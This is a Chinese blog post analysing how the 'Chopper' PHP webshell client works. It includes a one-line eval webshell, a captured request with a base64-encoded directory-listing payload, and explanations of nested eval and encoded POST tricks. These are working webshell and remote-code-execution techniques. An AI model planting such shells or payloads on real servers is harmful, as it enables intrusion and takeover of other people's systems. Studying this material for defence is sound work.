2. 程式人生 > >php菜刀分析學習

php菜刀分析學習

阿新 發佈:2017-07-06
amp lua 一個 pat 菜刀 erer apk log 工具

這裏以eval為例

我們知道, php中的eval能把字符串當代碼執行:

eval(‘phpcode‘);

註意, 這裏的代碼要有分號結尾, 我們測試:

我們創建一個最簡單的SHELL:

<?php
eval($_POST[‘a‘]);

在post數據位置發送:

a=phpinfo()

技術分享

可以看到phpinfo()並沒有執行。

原來原因是要加 ; 號結速一個語句, 像php語法一樣, 語句後面要加 ; 號。

這裏還有一個問題就是, 輸入的 a=phpinfo(); 不需要用單或雙引號括起來:

技術分享

再回到eval, 我們加多層eval看看:

<?php
eval(eval(eval($_POST[a])));

看到效果是一樣的:

技術分享

我們創建一個簡單WEBSHELL, 打開抓包工具抓菜刀包, 抓到的發送包是這樣的:

POST /2.php HTTP/1.1
Cache-Control: no-cache
X-Forwarded-For: 226.60.187.9
Referer: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host
 
: localhost
Content-Length: 738
Connection: Close

a=%40eval%01%28base64_decode%28%24_POST%5Bz0%5D%29%29%3B&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskRD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JEY9QG9wZW5kaXIoJEQpO2lmKCRGPT1OVUxMKXtlY2hvKCJFUlJPUjovLyBQYXRoIE5vdCBGb3VuZCBPciBObyBQZXJtaXNzaW9uISIpO31lbHNleyRNPU5VTEw7JEw9TlVMTDt3aGlsZSgkTj1AcmVhZGRpcigkRikpeyRQPSRELiIvIi4kTjskVD1AZGF0ZSgiWS1tLWQgSDppOnMiLEBmaWxlbXRpbWUoJFApKTtAJEU9c3Vic3RyKGJhc2VfY29udmVydChAZmlsZXBlcm1zKCRQKSwxMCw4KSwtNCk7JFI9Ilx0Ii4kVC4iXHQiLkBmaWxlc2l6ZSgkUCkuIlx0Ii4kRS4iCiI7aWYoQGlzX2RpcigkUCkpJE0uPSROLiIvIi4kUjtlbHNlICRMLj0kTi4kUjt9ZWNobyAkTS4kTDtAY2xvc2VkaXIoJEYpO307ZWNobygifDwtIik7ZGllKCk7&z1=RDpcXHBocFN0dWR5XFxXV1dcXA%3D%3D

單純地看上面的POST包, 在沒有base64解密前提下, 可以明顯的看到 菜刀會另外創造一個post數據(上圖中的是z0)發送回來給a。

我們可以得知, 菜刀發送的包, 有點像這樣:

<?php
eval($_POST[a]);
#post:
#$_POST[a] = 另一個post數據
#$_POST[a] = $_POST[b]
#傳入的$_POST[a]=$_POST[b]=b的內容

也就是說, 我們發送包時, 可以這樣構造一下:

a=$_POST[b]&b=phpinfo

這樣就相當於是:

a=phpinfo

記得我們上面說過, 要加 ; 號, 不用加單雙引號:

a=$_POST[b];&b=phpinfo()

這一個數據, 就相當於:

a=phpinfo();
#$_POST[b]替換成了: phpinfo()

我們測試一下效果:

技術分享

可以看到, 並沒有執行 phpinfo() 函數。

為什麽呢?

用一個小例子來說明為什麽:

echo ‘post[a]:‘.$_POST[a]."<br />";
echo ‘post[b]:‘.$_POST[b];

發送數據後如下所示:

技術分享

可以看到, a 的值是 $_POST[b]; , 但是這個 $_POST[b]; 只是一個單純字符串而已, 而這個字符串並未被當成php代碼解釋。

相當於我們創建了一個這樣的代碼: 

<?php
‘$_POST[b]‘;

這樣的參數肯定會出錯, 也相當於你創建了一個這樣的代碼:

eval(‘abcdefg‘);

eval要求是php代碼形式的字符串, 所以, 下面這樣就是合法的:

eval(‘echo "abcdefg";‘);

最後我們可以構造這樣的代碼:

eval(‘eval("$_POST[b]");‘)

這樣phpinfo函數就能正常運行了。

技術分享

把eval加進代碼裏:

技術分享

有一點要註意的就是 $_POST[b]中的PHP代碼參數要加 ; 號, 因為 $_POST[a] 裏的eval要用到, 而 $_POST[a]裏的php代碼也要加 ; 號, 因為源碼裏的eval也要用到。

在 $_POST[a]的位置我們也可以用base64編碼數據, 這樣 $_POST[b]的數據就可以很好的正常發送了:

技術分享

總之, a中的post數據中的eval目的是把他的值 $_POST[b] 解釋。

我們其實可以在發送數據位置單單用一個a=post數據就行了。

<?php
eval($_post[a]);

在接收後我們可以用自已相要的方式加解密(如果你數據有加密的話):

<?php
eval(base64_decode($_POST[a]));
#post
#a=cGhwaW5mbygpOw==

那個java的C刀就是這樣的做法。

php菜刀分析學習

相關推薦

php菜刀分析學習

amp lua 一個 pat 菜刀 erer apk log 工具 這裏以eval為例 我們知道, php中的eval能把字符串當代碼執行: eval(‘phpcode‘); 註意, 這裏的代碼要有分號結尾, 我們測試: 我們創建一個最簡單的SHELL: <

php laravel框架學習筆記 (二) 數據庫操作

true 數據 mar sql show top 一行 ati del 原博客鏈接:http://www.cnblogs.com/bitch1319453/p/6810492.html mysql基本配置 你可用通過配置環境變量,使用cmd進入mysql,當然還有一種東

【算法學習】03---算法分析學習

循環 log 對數 子集 empty 分析 bsp 結果 -a 算法分析 算法分析 科學方法 細致的觀察真實世界的特點 根據觀察結果提出假設模型 根據模型預測未來的事件 繼續觀察並核實預測的準確性 反復直到確認預測和觀察一致 一般程序

Tomcat7源碼分析學習系列之一-----tomcat的啟動文件startup的註釋

addition mission etl %0 很好 fine copy 文件結尾 存在 1. Windows系統,tomcat啟動文件startup.bat @echo off       rem 關閉回顯,不顯示下面的命令;rem Licensed to the Apa

後端PHP框架laravel學習踩的各種坑

and 錯誤信息 cnblogs 技術 deb src wro 分享 tor 安裝完laravel的ventor目錄後出現“Whoops, looks like something went wrong.”這樣的錯誤信息 打開config/app.php,打開debug為

逆向分析學習指南

代碼 學習 release sdn log 調試器 ase art csdn 1、逆向問題記錄 2、調試器相關筆記 3、逆向分析核心代碼定位   逆向分析學習指南

Discuz 7.2 faq.php漏洞分析

cat array src emp row 括號 查詢 d+ 參數 漏洞發生在頁面faq.php中,源碼如下: elseif($action == ‘grouppermission‘) {ksort($gids); $groupids = array();

數據分析學習(一)

nbsp ont 概率 學習 ron size 做到 由於 診斷 貝葉斯統計能夠幫助你利用基礎概率和波動數據做到明察秋毫。 問題:醫生給你一份蜥蜴流感診斷書。 好消息:蜥蜴流感並不致命。 壞消息:蜥蜴流感很麻煩。 診斷報告: 陽性 醫生確信你已經染病。不過由於你對數據分析得

算法導論17:攤還分析學習筆記

分析 大小 multi 算法 tip prim pri 但是 最大 在攤還分析中,通過求數據結構的一系列的操作的平均時間,來評價操作的代價。這樣,即使這些操作中的某個單一操作的代價很高,也可以證明平均代價很低。攤還分析不涉及概率,它可以保證最壞情況下每個操作的平均性能。

PHP yield 分析,以及協程的實現,超詳細版(上)

出錯 同時 分享圖片 spl 們的 是什麽 cti 接下來 版本 參考資料 http://www.laruence.com/2015/05/28/3038.html http://php.net/manual/zh/class.generator.php htt

saltstack SLS 實例分析學習

resolv grep style libevent epel manage nginx comm 4.2 文件下載:https://github.com/unixhot/saltbook-code 首先看一下目錄結構(沒用的已經刪掉): [root@k8s_

jQuery源碼逐行分析學習01(jQuery的框架結構簡化)

col 定義 源碼 來看 三方 spa 技術博客 功能 編寫 最近在學習jQuery源碼,在此,特別做一個分享,把所涉及的內容都記錄下來,其中有不妥之處還望大家指出,我會及時改正。望各位大神不吝賜教!同時,這也是我的第一篇前端技術博客,對博客編寫還不是很熟悉,美化工作可能不

jQuery源碼逐行分析學習02(第一部分:jQuery的一些變量和函數)

篩選 復雜 我們 分解 support letter content 變量 new對象 第一次嘗試使用Office Word,方便程度大大超過網頁在線編輯,不過初次使用,一些內容不甚熟悉,望各位大神見諒~ 在上次的文章中,把整個jQuery的結構進行了梳理,得到了整個jQu

Python數據分析學習-re正則表達式模塊

如果 dal nds 隨機數 choice 而且 inf groups 對象 正則表達式 為高級的文本模式匹配、抽取、與/或文本形式的搜索和替換功能提供了基礎。簡單地說,正則表達式(簡稱為 regex)是一些由字符和特殊符號組成的字符串,它們描述了模式的重復或者表述多個字

(獨孤九劍)--PHP視頻學習--錯誤處理

給他 log 關閉 生產 post 社會工程學 如何 txt文件 bsp (1)錯誤處理概念 在生產環境(即公網)給他人訪問的網站、手機網站、手機接口等。如果錯誤顯示出來就容易暴露 1.服務器文件路徑和文件存儲規範 2.有些人喜歡用個人名命名,通過社會工程學可以反向推理出密

(獨孤九劍)--PHP視頻學習--文件系統

獲取文件 pen 讀取 warning 寫入 字符型 級別 fread 資源 【一】文件系統概述 文件的創建,刪除,編輯,復制,粘貼(移動),即文件的增刪改查 【二】讀取文件 打開讀取:readfile(string),傳入文件路徑即可打開讀取(如讀取成功,則返回字節數

(獨孤九劍)--PHP視頻學習--cURL

開啟 blog print 關閉 pre time .cn http協議 exe 【一】概論 日常開發裏,cURL使用最多的協議就是HTTP協議的GET、POST請求,其他協議和請求方式用的較少。 【二】開啟 開發前檢驗是否開啟了cURL模塊,開啟方法為php.int中

php中traits學習筆記

mina markdown 組織結構 public access 類繼承 ams requests class traits學習 越來越多的框架和代碼開始使用traits方式去組織一些功能,這是非常高效的代碼組織結構。 通過trait來減少不必要的類繼承關

【數據分析學習筆記】用戶行為分析模型

密度 登錄用戶 精細化分析 做出 新版 分享圖片 結合 評價 指定 一、行為事件分析 1.什麽是行為事件分析 企業追蹤或記錄的用戶行為或業務過程,如用戶註冊、瀏覽產品詳情頁、成功投資、提現等,通過研究與事件發生關聯的所有因素來挖掘用戶行為事件背後的原因、交互影響等。 2.行

大數據分析學習之使用R語言實戰機器學習視頻課程

https aid 通過 原理 har fsg follow mdf 學習 大數據分析學習之使用R語言實戰機器學習網盤地址:https://pan.baidu.com/s/1Yi9H6s8Eypg_jJJlQmdFSg 密碼:0jz3備用地址(騰訊微雲):https://s